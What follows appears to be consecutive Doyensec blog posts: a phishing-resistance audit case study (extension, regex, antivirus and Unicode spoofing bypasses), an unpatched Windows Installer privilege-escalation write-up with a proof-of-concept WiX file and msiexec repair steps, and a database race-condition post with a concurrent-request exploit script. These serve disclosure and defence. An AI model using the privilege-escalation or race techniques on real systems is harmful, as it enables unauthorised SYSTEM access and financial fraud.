While such threats cannot be fully eliminated, it is possible to minimize the possibilities for exploitation. Recognizing this, Doyensec was hired to performed a security review, specifically focused on social engineering attacks and phishing in particular. The engagement, performed earlier this year, has proven to be extremely valuable for both parties. Most importantly, our client used to the results to greatly increase their platform’s resilience against social engineering attacks. Additionally, Doyensec engineers had a great opportunity to unleash their creativity on bugs that are often overlooked, or at least heavily undervalued (looking at you, CVSS score!), during standard security audits as well as the opportunity to look at defending the application from a blue-team perspective.

The following case study will discuss some of the vulnerabilities that were addressed as part of this audit. Hopefully, this post will be useful for developers to understand what kind of vulnerabilities can be lurking in their platforms too. It also helps to demonstrate how valuable such focused engagements can be as an addition to standard web engagements.

Attachments Handling

For any customer support organization, file attachment management is a crucial feature. On one hand, it is crucial for users to be able to share file samples, screenshots, etc. with their interlocutors. On the other hand, sharing files is always a hotbed for exploiting all manner of security bugs, especially when accepting files from untrusted parties. Therefore, hardening this part of the application will always require careful considerations as to how to ensure confidentiality and integrity without sacrificing usability.

File Extension Restriction Bypass via Trailing Period

The tested platform employs a robust system designed to validate allowed file extensions and content types for file uploads, featuring a global ban list for inherently dangerous file types, such as executables (e.g., .exe). These measures are intended to prevent the uploading and distribution of potentially malicious files. However, by exploiting some browsers’ quirks, a vulnerability was discovered that allowed users to bypass these restrictions simply by appending a trailing period (“dangling dot”) to the file extension.

It was possible to bypass this file extension restriction by crafting an upload request with a prohibited extension, such as .exe.. This resulted in the system accepting the file, since it ostensibly met the criteria for allowed uploads - which included an empty extension. However, Firefox and Chromium-based browsers remove the dangling dot (interestingly, Safari retains it). As a result, the file was saved with an original .exe extension on the victim’s filesystem:

The recommendation is simple here. Trailing dots should be removed from the filenames. It rarely has any use in real-world scenarios, therefore the usability tradeoff is minimal.

Circumvention of Content Origin Restrictions via Subdomain Crafting

Platform chats have been created with a restriction, which allows link attachments from our client’s subdomains only. This security control is designed to restrict uploads and references to images and attachments to a predefined set of origins, preventing the use of external sources that could be employed in phishing attacks. The intended validation process relies on an allowlist of domains.

However, when validating (sub)domains using regular expressions, it’s easy to forget the intricacies of this syntax, which can lead to hard-to-spot bypasses.

Doyensec observed that subdomains were matched using an allowlist of regular expressions similar to /acme-attachments-1.com/. Such a regular expression does not enforce the beginning and the end of the string and will therefore accept any domains that contain the desired subdomain. An attacker could create a subdomain similar to acme-attachments-1.com.doyensec.com, which would be accepted despite this security mechanism.

Another common (although not exploitable in this case) mistake is forgetting that the dot (.) character is treated as a wildcard by regular expressions. When one forgets to escape a dot in a domain regex, an attacker can register a domain which will bypass such a restriction. For instance, a regular expression similar to downloads.acmecdn.com would accept an attacker-controlled domain like downloadsAacmecdn.com.

It is worth noting that as innocuous as this vulnerability seems to be, it actually has great potential for creating successful phishing attacks. When a victim receives an attachment in a trusted platform, they’re far more likely to follow the link. Also, a login page would not be surprising for a victim, further increasing the likelihood of them giving away their credentials.

Antivirus Scan Bypass

The platform appropriately implements antivirus scanning on all incoming files. However, an attacker could obfuscate the true content of the payload by creating an encrypted archive: $ zip -e test_encrypted.zip eicar.com.

There is no simple solution to solve this issue. Banning encrypted archives altogether is a usability trade-off that might be unacceptable in some cases. Doyensec recommended clearly warning users against opening encrypted files at the very least. It might be also useful to allow the clients to choose which side of this trade-off is acceptable for them by creating a proper configuration switch.

HTML Input Handling

When it comes to exchanging messages, it can be very useful to add formatting and give users more ways of expressing themselves. On the other hand, when messages are coming from untrusted sources, such a feature can enable attackers to craft sophisticated attacks that involve UI redressing, e.g., emulating UI elements within their messages.

Our client has found a great way to balance usability and security. While trusted users have a rich choice of input formatting options, untrusted users from outside the platform can only share basic plain-text messages. It also worth noting that even trusted users can’t inject arbitrary HTML to their messages, given that HTML tags are properly parsed and encoded. There are however specific tags that are allowed and, in some cases, converted into more elaborate elements (e.g., link tags get converted into buttons).

Doyensec found this solution well-architected at the design level. However, due to an oversight in the implementation, the public messaging API also accepted a “hidden” (not used by the frontend) parameter which allowed some HTML elements. Doyensec was able to exploit the conversion of links into buttons to demonstrate the potential for UI elements to be spoofed using this vulnerability.

The issue was resolved by completely disabling this parameter in the public API, only allowing authenticated users to format their messages.

Links Presentation Bugs

Data presentation bugs are a threat that is especially overlooked. Despite their potential to manipulate or distort critical information, data presentation bugs are frequently underestimated in security assessments and overlooked in the prioritization of remediation efforts. However, their exploitation can lead to serious consequences including phishing.

Misleading Unicode Domain Rendering

To understand this issue, it is important to understand two different terms. First, Punycode which is a character encoding scheme used to represent Unicode characters in domain names. It enables browsers and other web clients to handle Unicode in domain names. Secondly, we have homoglyphs, which are characters that look very similar to each other, but have different codes. While being visually indistinguishable, consider that the characters ‘a’ (code: 0x61) and ‘а’ (code: 0x430) are actually two different characters leading to two different domains when used in a URL.

One of the most prominent examples of this threat was created by the researcher Xudong Zheng. This researcher created a link that looks deceivingly similar to the widely trusted www.apple.com domain. However, the link https://www.аррӏе.com actually resolves to www.xn--80ak6aa92e.com, after unrolling the Punycode string. Visiting the link reveals that it is not controlled by Apple, despite its convincing appearance:

To protect users from these types of issues, we recommended rendering Unicode domains in Punycode format. This way users are not deceived in regards to where the given link leads.

URI and Filename Spoofing via RTLO Injection

Using the Right-To-Left Override (RTLO) character is another technique for manipulating the way links are displayed. The RTLO character changes the order in which consecutive characters are rendered. When it comes to filenames and URLs, their structures are fixed and the character order matters. Therefore, flipping the character order is an effective way of obscuring the true target of the link, or the extension of a file.

Sound complicated? An example will clear it up. Consider the link to an attacker-controlled domain: https://gepj.net/selif#/moc.rugmi It looks suspicious, however when prepended with the RTLO Unicode character ([U+202E]https://gepj.net/selif#/moc.rugmi) it’ll render in the following way:

A displayed file extensions can be manipulated in a similar manner:

Consider a file named test.[U+202E]fdp.zip:

The proposed solution here is simple - stricter filtering. URLs should not be rendered as links when the character order is changed. Similarly, filenames containing character flow manipulators should be rejected.

Even when the links are always properly displayed, there still remains a chance that an attacker can create a successful phishing campaign. After all, users could always get coerced into following a malicious link. Such a risk cannot be fully eliminated, but it can be mitigated with additional hardening. The examined platform implements navigation confirmation interstitials. This means, that anytime a user follows a link outside of the platform, an additional confirmation screen will appear. Such UI elements inform the user that they’re leaving a safe environment. This UX design greatly decreases the chances of a successful phishing attack.

Summary

This project is a great example of a proactive engagement against specific threats. Given the particular threat model of this platform, such an engagement has proven extremely useful as an addition to regular security assessments and their bug bounty program. In particular, an engagement specifically focused on phishing and social engineering allowed us to craft a list of recommendations and hardening ideas that would have otherwise just been a side note in a regular security review.

Windows Installer, Exploiting Custom Actions

2024-07-18T00:00:00+02:00

Over a year ago, I published my research around the Windows Installer Service. The article explained in detail how the MSI repair process executes in an elevated context, but the lack of impersonation could lead to Arbitrary File Delete and similar issues. The issue was acknowledged by Microsoft (as CVE-2023-21800), but it was never directly fixed. Instead, the introduction of a Redirection Guard mitigated all symlink attacks in the context of the msiexec process. Back then, I wasn’t particularly happy with the solution, but I couldn’t find any bypass.

The Redirection Guard turned out to work exactly as intended, so I spent some time attacking the Windows Installer Service from other angles. Some bugs were found (CVE-2023-32016), but I always felt that the way Microsoft handled the impersonation issue wasn’t exactly right. That unfixed behavior became very useful during another round of research.

This article describes the unpatched vulnerability affecting the latest Windows 11 versions. It illustrates how the issue can be leveraged to elevate a local user’s privileges. The bug submission was closed after half-a-year of processing, as non-reproducible. I will demonstrate how the issue can be reproduced by anyone else.

Custom Actions

Custom Actions in the Windows Installer world are user-defined actions that extend the functionality of the installation process. Custom Actions are necessary in scenarios where the built-in capabilities of Windows Installer are insufficient. For example, if an application requires specific registry keys to be set dynamically based on the user’s environment, a Custom Action can be used to achieve this. Another common use case is when an installer needs to perform complex tasks like custom validations or interactions with other software components that cannot be handled by standard MSI actions alone.

Overall, Custom Actions can be implemented in different ways, such as:

Compiled to custom DLLs using the exposed C/C++ API
Inline VBScript or JScript snippets within the WSX file
Explicitly calling system commands within the WSX file

All of the above methods are affected, but for simplicity, we will focus on the last type.

Let’s take a look at an example WSX file (poc.wsx) containing some Custom Actions:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
    <Product Id="{12345678-9259-4E29-91EA-8F8646930000}" Language="1033" Manufacturer="YourCompany" Name="HelloInstaller" UpgradeCode="{12345678-9259-4E29-91EA-8F8646930001}" Version="1.0.0.0">
        <Package Comments="This installer database contains the logic and data required to install HelloInstaller." Compressed="yes" Description="HelloInstaller" InstallerVersion="200" Languages="1033" Manufacturer="YourCompany" Platform="x86" ReadOnly="no" />

        <CustomAction Id="SetRunCommand" Property="RunCommand" Value="&quot;[%USERPROFILE]\test.exe&quot;" Execute="immediate" />
        <CustomAction Id="RunCommand" BinaryKey="WixCA" DllEntry="WixQuietExec64" Execute="commit" Return="ignore" Impersonate="no" />
        <Directory Id="TARGETDIR" Name="SourceDir">
            <Directory Id="ProgramFilesFolder">
                <Directory Id="INSTALLFOLDER" Name="HelloInstaller" ShortName="krp6fjyg">
                    <Component Id="ApplicationShortcut" Guid="{12345678-9259-4E29-91EA-8F8646930002}" KeyPath="yes">
                        <CreateFolder Directory="INSTALLFOLDER" />
                    </Component>
                </Directory>
            </Directory>
        </Directory>
        <Property Id="ALLUSERS" Value="1" />
        <Feature Id="ProductFeature" Level="1" Title="Main Feature">
            <ComponentRef Id="ApplicationShortcut" />
        </Feature>
        <MajorUpgrade DowngradeErrorMessage="A newer version of [ProductName] is already installed." Schedule="afterInstallValidate" />

        <InstallExecuteSequence>
            <Custom Action="SetRunCommand" After="InstallInitialize">1</Custom>
            <Custom Action="RunCommand" After="SetRunCommand">1</Custom>
        </InstallExecuteSequence>
    </Product>
</Wix>

This looks like a perfectly fine WSX file. It defines the InstallExecuteSequence, which consists of two custom actions. The SetRunCommand is queued to run right after the InstallInitialize event. Then, the RunCommand should start right after SetRunCommand finishes.

The SetRunCommand action simply sets the value of the RunCommand property. The [%USERPROFILE] string will be expanded to the path of the current user’s profile directory. This is achieved by the installer using the value of the USERPROFILE environment variable. The expansion process involves retrieving the environment variable’s value at runtime and substituting [%USERPROFILE] with this value.

The second action, also called RunCommand, uses the RunCommand property and executes it by calling the WixQuietExec64 method, which is a great way to execute the command quietly and securely (without spawning any visible windows). The Impersonate="no" option enables the command to execute with LocalSystem’s full permissions.

On a healthy system, the administrator’s USERPROFILE directory cannot be accessed by any less privileged users. Whatever file is executed by the RunCommand shouldn’t be directly controllable by unprivileged users.

We covered a rather simple example. Implementing the intended Custom Action is actually quite complicated. There are many mistakes that can be made. The actions may rely on untrusted resources, they can spawn hijackable console instances, or run with more privileges than necessary. These dangerous mistakes may be covered in future blogposts.

Testing the Installer

Having the WiX Toolset at hand, we can turn our XML into an MSI file. Note that we need to enable the additional WixUtilExtension to use the WixCA:

candle .\poc.wxs 
light .\poc.wixobj -ext WixUtilExtension.dll

The poc.msi file should be created in the current directory.

According to our WSX file above, once the installation is initialized, our Custom Action should run the "[%USERPROFILE]\test.exe" file. We can set up a ProcMon filter to look for that event. Remember to also enable the “Integrity” column.

We can install the application using any Admin account (the Almighty user here)

msiexec /i C:\path\to\poc.msi

ProcMon should record the CreateFile event. The file was not there, so additional file extensions were tried.

The same sequence of actions can be reproduced by running an installation repair process. The command can point at the specific C:/Windows/Installer/*.msi file or use a GUID that we defined in a WSX file:

msiexec /fa {12345678-9259-4E29-91EA-8F8646930000}

The result should be exactly the same if the Almighty user triggered the repair process.

On the other hand, note what happens if the installation repair was started by another unprivileged user: lowpriv.

It is the user’s environment that sets the executable path, but the command still executes with System level integrity, without any user impersonation! This leads to a straightforward privilege escalation.

As a final confirmation, the lowpriv user would plant an add-me-as-admin type of payload under the C:/Users/lowpriv/test.exe path. The installation process will not finish until the test.exe is running, handling that behavior is rather trivial, though.

Optionally, add /L*V log.txt to the repair command for a detailed log. The poisoned properties should be evident:

MSI (s) (98:B4) [02:01:33:733]: Machine policy value 'AlwaysInstallElevated' is 0
MSI (s) (98:B4) [02:01:33:733]: User policy value 'AlwaysInstallElevated' is 0
...
Action start 2:01:33: InstallInitialize.
MSI (s) (98:B4) [02:01:33:739]: Doing action: SetRunCommand
MSI (s) (98:B4) [02:01:33:739]: Note: 1: 2205 2:  3: ActionText
Action ended 2:01:33: InstallInitialize. Return value 1.
MSI (s) (98:B4) [02:01:33:740]: PROPERTY CHANGE: Adding RunCommand property. Its value is '"C:\Users\lowpriv\test.exe"'.
Action start 2:01:33: SetRunCommand.
MSI (s) (98:B4) [02:01:33:740]: Doing action: RunCommand
MSI (s) (98:B4) [02:01:33:740]: Note: 1: 2205 2:  3: ActionText
Action ended 2:01:33: SetRunCommand. Return value 1.

The Poisoned Variables

The repair operation in msiexec.exe can be initiated by a standard user, while automatically elevating its privileges to execute certain actions, including various custom actions defined in the MSI file. Notably, not all custom actions execute with elevated privileges. Specifically, an action must be explicitly marked as Impersonate="no", be scheduled between the InstallExecuteSequence and InstallFinalize events, and use either commit, rollback or deferred as the execution type to run elevated.

In the future, we may publish additional materials, including a toolset to hunt for affected installers that satisfy the above criteria.

Elevated custom actions may use environment variables as well as Windows Installer properties (see the full list of properties). I’ve observed the following properties can be “poisoned” by a standard user that invokes the repair process:

“AdminToolsFolder”
“AppDataFolder”
“DesktopFolder”
“FavoritesFolder”
“LocalAppDataFolder”
“MyPicturesFolder”
“NetHoodFolder”
“PersonalFolder”
“PrintHoodFolder”
“ProgramMenuFolder”
“RecentFolder”
“SendToFolder”
“StartMenuFolder”
“StartupFolder”
“TempFolder”
“TemplateFolder”

Additionally, the following environment variables are often used by software installers (this list is not exhaustive):

“APPDATA”
“HomePath”
“LOCALAPPDATA”
~~“TEMP”~~
~~“TMP”~~ (Meanwhile, a separate patch introduced the SystemTemp concept and remediated these two variables. Thanks to @pfiatde for pointing it out!)
“USERPROFILE”

These values are typically utilized to construct custom paths or as system command parameters. Poisoned values can alter the command’s intent, potentially leading to a command injection vulnerability.

Note that the described issue is not exploitable on its own. The MSI file utilizing a vulnerable Custom Action must be already installed on the machine. However, the issue could be handy to pentesters performing Local Privilege Elevation or as a persistence mechanism.

Disclosure Timeline

The details of this issue were reported to the Microsoft Security Response Center on December 1, 2023. The bug was confirmed on the latest Windows Insider Preview build at the time of the reporting: 26002.1000.rs_prerelease.231118-1559.

Disclosure Timeline	Status
12/01/2023	The vulnerability reported to Microsoft
02/09/2024	Additional details requested
02/09/2024	Additional details provided
05/09/2024	Issue closed as non-reproducible: “We completed the assessment and because we weren’t able to reproduce the issue with the repro steps provide _[sic]_. We don’t expect any further action on the case and we will proceed with closing out the case.”

We asked Microsoft to reopen the ticket and the blogpost draft was shared with Microsoft prior to the publication.

As of now, the issue is still not fixed. We confirmed that it is affecting the current latest Windows Insider Preview build 10.0.25120.751.

A Race to the Bottom - Database Transactions Undermining Your AppSec

2024-07-11T00:00:00+02:00

Introduction

Databases are a crucial part of any modern application. Like any external dependency, they introduce additional complexity for the developers building an application. In the real world, however, they are usually considered and used as a black box which provides storage functionality.

This post aims shed light on a particular aspect of the complexity databases introduce which is often overlooked by developers, namely concurrency control. The best way to do that is to start off by looking at a fairly common code pattern we at Doyensec see in our day-to-day work:

func (db *Db) Transfer(source int, destination int, amount int) error {
  ctx := context.Background()

  conn, err := pgx.Connect(ctx, db.databaseUrl)
  defer conn.Close(ctx)

  // (1)
  tx, err := conn.BeginTx(ctx)

  var user User
  // (2)
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", source).
    Scan(&user.Id, &user.Name, &user.Balance)

  // (3)
  if amount <= 0 || amount > user.Balance {
    tx.Rollback(ctx)
    return fmt.Errorf("invalid transfer")
  }

  // (4)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = balance - $2 WHERE id = $1", source, amount)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = balance + $2 WHERE id = $1", destination, amount)

  // (5)
  err = tx.Commit(ctx)
  return nil
}

Note: All error checking has been removed for clarity.

For the readers not familiar with Go, here’s a short summary of what the code is doing. We can assume that the application will initially perform authentication and authorization on the incoming HTTP request. When all required checks have passed, the db.Transfer function handling the database logic will be called. At this point the application will:

1. Establish a new database transactions
2. Read the source account’s balance
3. Verify that the transfer amount is valid with regard to the source account’s balance and the application’s business rules
4. Update the source and destination accounts’ balances appropriately
5. Commit the database transaction

A transfer can be made by making a request to the /transfer endpoint, like so:

POST /transfer HTTP/1.1
Host: localhost:9009
Content-Type: application/json
Content-Length: 31

{
    "source":1,
    "destination":2,
    "amount":50
}

We specify the source and destination account IDs, and the amount to be transferred between them. The full source code, and other sample apps developed for this research can be found in our playground repo.

Before continuing reading, take a minute and review the code to see if you can spot any issues.

Notice anything? At first look, the implementation seems correct. Sufficient input validation, bounds and balance checks are performed, no possibility of SQL injection, etc. We can also verify this by running the application and making a few requests. We’ll see that transfers are being accepted until the source account’s balance reaches zero, at which point the application will start returning errors for all subsequent requests.

Fair enough. Now, let’s try some more dynamic testing. Using the following Go script, let us try and make 10 concurrent requests to the /transfer endpoint. We’d expect that two request will be accepted (two transfers of 50 with an initial balance of 100) and the rest will be rejected.

func transfer() {
	client := &http.Client{}

	body := transferReq{
		From:   1,
		To:     2,
		Amount: 50,
	}
	bodyBuffer := new(bytes.Buffer)
	json.NewEncoder(bodyBuffer).Encode(body)

	req, err := http.NewRequest("POST", "http://localhost:9009/transfer", bodyBuffer)
	if err != nil {
		panic(err)
	}
	req.Header.Add("Content-Type", `application/json`)
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	} else if _, err := io.Copy(os.Stdout, resp.Body); err != nil {
		panic(err)
	}
	fmt.Printf(" / status code => %v\n", resp.StatusCode)
}

func main() {
	for i := 0; i < 10; i++ {
		// run transfer as a goroutine
		go transfer()
	}
	time.Sleep(time.Second * 2)
	fmt.Printf("done.\n")
}

However, running the script we see something different. We see that almost all, if not all, of the request were accepted and successfully processed by the application server. Viewing the balance of both accounts with the /dump endpoint will show that the source account has a negative balance.

We have managed to overdraw our account, effectively making money out of thin air! At this point, any person would be asking “why?” and “how?”. To answer them, we first need to take a detour and talk about databases.

Database Transactions and Isolation Levels

Transactions are a way to define a logical unit of work within a database context. Transactions consist of multiple database operations which need to be successfully executed, for the unit to be considered complete. Any failure would result in the transaction being reverted, at which point the developer needs to decide whether to accept the failure or retry the operation. Transactions are a way to ensure ACID properties for database operations. While all properties are important to ensure data correctness and safety, for this post we’re only interested in the “I” or Isolation.

In short, Isolation defines the level to which concurrent transactions will be isolated from each other. This ensures they always operate on correct data and don’t leave the database in an inconsistent state. Isolation is a property which is directly controllable by developers. The ANSI SQL-92 standard defines four isolation levels, which we will take a look at in more detail later onm, but first we need to understand why we need them.

Why Do We Need Isolation?

The isolation levels are introduced to eliminate read phenomena or unexpected behaviors, which can be observed when concurrent transactions are being performed on the set of data. The best way to understand them is with a short example, graciously borrowed from Wikipedia.

Dirty Reads

Dirty reads allow transactions to read uncommitted changes made by concurrent transactions.

-- tx1
BEGIN;
SELECT age FROM users WHERE id = 1; -- age = 20 
-- tx2
BEGIN;
UPDATE users SET age = 21 WHERE id = 1;
-- tx1
SELECT age FROM users WHERE id = 1; -- age = 21 
-- tx2
ROLLBACK; -- the second read by tx1 is reverted

Non-Repeatable Reads

Non-repeatable reads allow sequential SELECT operations to return different results as a result of concurrent transactions modifying the same table entry.

-- tx1
BEGIN;
SELECT age FROM users WHERE id = 1; -- age = 20 
-- tx2
UPDATE users SET age = 21 WHERE id = 1;
COMMIT;
-- tx2
SELECT age FROM users WHERE id = 1; -- age = 21

Phantom Reads

Phantom reads allow sequential SELECT operations on a set of entries to return different results due to modifications done by concurrent transactions.

-- tx1
BEGIN;
SELECT name FROM users WHERE age > 17; -- returns [Alice, Bob]
-- tx2
BEGIN;
INSERT INTO users VALUES (3, 'Eve', 26);
COMMIT;
-- tx1
SELECT name FROM users WHERE age > 17; -- returns [Alice, Bob, Eve]

In addition the phenomena defined in the standard, behaviors such as “Read Skews”, “Write Skews” and “Lost Updates” can be observed in the real world.

Lost Updates

Lost updates occur when concurrent transactions perform an update on the same entry.

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1;
-- tx2
BEGIN;
SELECT * FROM users WHERE id = 1;
UPDATE users SET name = 'alice' WHERE id = 1;
COMMIT; -- name set to 'alice'
-- tx1
UPDATE users SET name = 'bob' WHERE id = 1;
COMMIT; -- name set to 'bob'

This execution flow results in the change performed by tx2 to be overwritten by tx1.

Read and write skews usually arise when the operations are performed on two or more entries that have a foreign-key relationship. The examples below assume that the database contains two tables: a users table which stores information about a particular user, and a change_log table which stores information about the user who performed the latest change of the target user’s name column:

CREATE TABLE users(
  id INT PRIMARY KEY NOT NULL, 
  name TEXT NOT NULL
);

CREATE TABLE change_log(
  id INT PRIMARY KEY NOT NULL, 
  updated_by VARCHAR NOT NULL, 
  user_id INT NOT NULL,
  CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users(id)
);

Read Skews

If we assume that we have the following sequence of execution:

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1; -- returns 'old_name'
-- tx2
BEGIN;
UPDATE users SET name = 'new_name' WHERE id = 1;
UPDATE change_logs SET updated_by = 'Bob' WHERE user_id = 1;
COMMIT;
-- tx1
SELECT * FROM change_logs WHERE user_id = 1; -- return Bob

the view of tx1 transaction is that the user Bob performed tha last change on the user with ID: 1, setting their name to old_name.

Write Skews

In the sequence of operations shown below, tx1 will perform its update under the assumption that the user’s name is Alice and there were no prior changes on the name.

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1; -- returns Alice
SELECT * FROM change_logs WHERE user_id = 1; -- returns an empty set
-- tx2
BEGIN;
SELECT * FROM users WHERE id = 1; 
UPDATE users SET name = 'Bob' WHERE id = 1; -- new name set
COMMIT;
-- tx1
UPDATE users SET name = 'Eve' WHERE id = 1; -- new name set
COMMIT;

However, tx2 performed its changes before tx1 was able to complete. This results in tx1 performing an update based on state which was changed during its execution.

Isolation levels are designed to guard against zero or more of these read phenomena. Let’s look at the them is more detail.

Read Uncommitted

Read Uncommitted (RU) is the lowest isolation level provided. At this level, all phenomena discussed above can be observed, including reading uncommitted data, as the name suggests. While transactions using this isolation level can result in higher throughput in highly concurrent environments, it does mean that concurrent transactions will likely operate with inconsistent data. From a security standpoint, this is not a desirable property of any business-critical operation.

Thankfully, this it not a default in any database engine, and needs to be explicitly set by developers when a creating a new transaction.

Read Committed

Read Committed (RC) builds on top of the previous level’s guarantee and completely prevents dirty reads. However, it does allow other transactions to modify, insert, or delete data between individual operations of the running transaction, which can result in non-repeatable and phantom reads.

Read Committed is the default isolation level in most database engines. MySQL is an outlier here.

Repeatable Read

In similar fashion, Repeatable Read (RR) improves the previous isolation level, while adding a guarantee that non-repeatable reads will also be prevented. The transaction will view only data which was committed at the start of the transactions. Phantom reads can still be observed at this level.

Serializable

Finally, we have the Serializable (S) isolation level. The highest level is designed to prevent all read phenomena. The result of concurrently executing multiple transactions with Serializable isolation will be equivalent to them being executed in serial order.

Data Races and Race Conditions

Now that we have that covered, let’s circle back to the original example. If we assume that the example was using Postgres and we’re not explicitly setting the isolation level, we’ll be using the Postgres default: Read Committed. This setting will protect us from dirty reads, and phantom or non-repeatable reads are not a concern, since we’re not performing multiple reads within the transaction.

The main reason why our example is vulnerable boils down to concurrent transaction execution and insufficient concurrency control. We can enable database logging to easily see what is being executed on the database level when our example application is being exploited.

Pulling the logs for our example, we can see something similar to:

[TX1] LOG:  BEGIN ISOLATION LEVEL READ COMMITTED
[TX2] LOG:  BEGIN ISOLATION LEVEL READ COMMITTED
[TX1] LOG:  SELECT id, name, balance FROM users WHERE id = 2
[TX2] LOG:  SELECT id, name, balance FROM users WHERE id = 2
[TX1] LOG:  UPDATE users SET balance = balance - 50 WHERE id = 2
[TX2] LOG:  UPDATE users SET balance = balance - 50 WHERE id = 2
[TX1] LOG:  UPDATE users SET balance = balance + 50 WHERE id = 1
[TX1] LOG:  COMMIT
[TX2] LOG:  UPDATE users SET balance = balance + 50 WHERE id = 1
[TX2] LOG:  COMMIT

What we initially notice is that the individual operations of a single transaction are not executed as a single unit. Their individual operations are interweaved, contradicting how the initial transaction definition described them (i.e., a single unit of execution). This interweaving occurs as a result of transactions being executed concurrently.

Concurrent Transaction Execution

Databases are designed to execute their incoming workload concurrently. This results in an increased throughput and ultimately a more performant system. While implementation details can vary between different database vendors, at a high level concurrent execution is implemented using “workers”. Databases define a set of workers whose job is to execute all transactions assigned to them by a component usually named “scheduler”. The workers are independent of each other and can be conceptually thought of as application threads. Like application threads, they are subject to context switching, meaning that they can be interrupted mid-execution, allowing other workers to perform their work. As a result we can end up having partial transaction execution, resulting in the interweaved operations we saw in the log output above. As with multithreaded application code, without proper concurrency control, we run the risk of encountering data races and race conditions.

Going back to the database logs, we can also see that both transactions are trying to perform an update on the same entry, one after the other (lines #5 and #6). Such concurrent modification will be prevented by the database by setting a lock on the modified entry, protecting the change until the transaction that made the change completes or fails. Databases vendors are free to implement any number of different lock types, but most of them can be simplified to two types: shared and exclusive locks.

Shared (or read) locks are acquired on table entries read from the database. They are not mutually exclusive, meaning multiple transactions can hold a shared lock on the same entry.

Exclusive (or write) locks, as the name suggests are exclusive. Acquired when a write/update operation is performed, only one lock of this type can be active per table entry. This helps prevent concurrent changes on the same entry.

Database vendors provide a simple way to query active locks at any time of the transactions execution, given you can pause it or are executing it manually. In Postgres for example, the following query will show the active locks:

SELECT locktype, relation::regclass, mode, transactionid AS tid, virtualtransaction AS vtid, pid, granted, waitstart FROM pg_catalog.pg_locks l LEFT JOIN pg_catalog.pg_database db ON db.oid = l.database WHERE (db.datname = '<db_name>' OR db.datname IS NULL) AND NOT pid = pg_backend_pid() ORDER BY pid;

A similar query can be used for MySQL:

SELECT thread_id, lock_data, lock_type, lock_mode, lock_status FROM performance_schema.data_locks WHERE object_name = '<db_name>';

For other database vendors refer to the appropriate documentation.

Root Cause

The isolation level used in our example (Read Committed) will not place any locks when data is being read from the database. This means that only the write operations will be placing locks on the modified entries. If we visualize this, our issue becomes clear:

The lack of locking on the SELECT operation allows for concurrent access to a shared resource. This introduces a TOCTOU (time-of-check, time-of-use) issue, leading to an exploitable race condition. Even though the issue is not visible in the application code itself, it becomes obvious in the database logs.

Applying Theory in Practice

Different code patterns can allow for different exploit scenarios. For our particular example, the main difference will be how the new application state is calculated, or more specifically, which values are used in the calculation.

Pattern #1 - Calculations Using Current Database State

In the original example, we can see that the new balance calculations will happen on the database server. This is due to how the UPDATE operation is structured. It containins a simple addition/subtraction operation, which will be calculated by the database using the current value of the balance column at time of execution. Putting it all together, we end up with an execution flow shown on the graph below.

Using the database’s default isolation level, the SELECT operation will be executed before any locks are created and the same entry will be returned to the application code. The transaction which gets its first UPDATE to execute, will enter the critical section and will be allowed to execute its remaining operations and commit. During that time, all other transactions will hang and wait for the lock to be released. By committing its changes, the first transaction will change the state of the database, effectively breaking the assumption under which the waiting transaction was initiated on. When the second transaction executes its UPDATEs, the calculations will be performed on the updated values, leaving the application in an incorrect state.

Pattern #2 - Calculations Using Stale Values

Working with stale values happens when the application code reads the current state of the database entry, performs the required calculations at the application layer and uses the newly calculated value in an UPDATE operation. We can perform a simple refactoring to our initial example and move the “new value” calculation to the application layer.

func (db *Db) Transfer(source int, destination int, amount int) error {
  ctx := context.Background()
  conn, err := pgx.Connect(ctx, db.databaseUrl)
  defer conn.Close(ctx)

  tx, err := conn.BeginTx(ctx)

  var userSrc User
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", source).
    Scan(&userSrc.Id, &userSrc.Name, &userSrc.Balance)

  var userDest User
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", destination).
    Scan(&userDest.Id, &userDest.Name, &userDest.Balance)

  if amount <= 0 || amount > userSrc.Balance {
    tx.Rollback(ctx)
    return fmt.Errorf("invalid transfer")
  }

  // note: balance calculations moved to the application layer
  newSrcBalance := userSrc.Balance - amount
  newDestBalance := userDest.Balance + amount

  _, err = conn.Exec(ctx, "UPDATE users SET balance = $2 WHERE id = $1", source, newSrcBalance)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = $2 WHERE id = $1", destination, newDestBalance)

  err = tx.Commit(ctx)
  return nil
}

If two or more concurrent requests call the db.Transfer function at the same time, there is a high probability that the initial SELECT will be executed before any locks are created. All function calls will read the same value from the database. The amount verification will pass successfully and the new balances will be calculated. Let’s see how does this scenario affect out database state if we run the previous test case:

At first glance, the database state doesn’t show any inconsistencies. That is because both transactions preformed their amount calculation based on the same state and both executed UPDATE operations with the same amounts. Even though the database state was not corrupted, it’s worth bearing in mind that we were able to execute the transaction more times that what the business logic should allow. For example, an application built using a microservice architecture might implement business logic such as:

If Service T assumes that all incoming requests from the main application are valid, and does not perform any additional validation itself, it will happily process any incoming requests. The race condition described before allows us to exploit such behavior and call the downstream Service T multiple times, effectively performing more transfers that the business requirements would allow.

This pattern can also be (ab)used to corrupt the database state. Namely, we can perform multiple transfers from the source account to different destination accounts.

With this exploit, both concurrent transactions will initially see a source balance of 100, which will pass the amount verification.

Exploitation in the Real World

If you run the sample application locally, with a database running on the same machine, you will likely see that most, if not all, of the requests made to the /transfer endpoint will be accepted by the application server. The low latency between client, application server and database server allow all requests to hit the race window and successfully commit. However, real-world application deployments are much more complex, running in cloud environments, deployed using Kubernetes clusters, placed behind reverse proxies and protected by firewalls.

We were curious to see how difficult is to hit the race window in a real-world context. To test that we set up a simple application, deployed in an AWS Fargate container, alongside another container running the selected database.

Testing was focused on three databases: Postgres, MySQL and MariaDB.

The application logic was implemented using two programming languages: Go and Node. These languages were chosen to allow us to see how their different concurrency models (Go’s goroutines vs. Node’s event loop) impact exploitability.

Finally, we specified three techniques of attacking the application:

1. simple multi-threaded loop
2. last-byte sync for HTTP/1.1
3. single packet attacks for HTTP/2.0

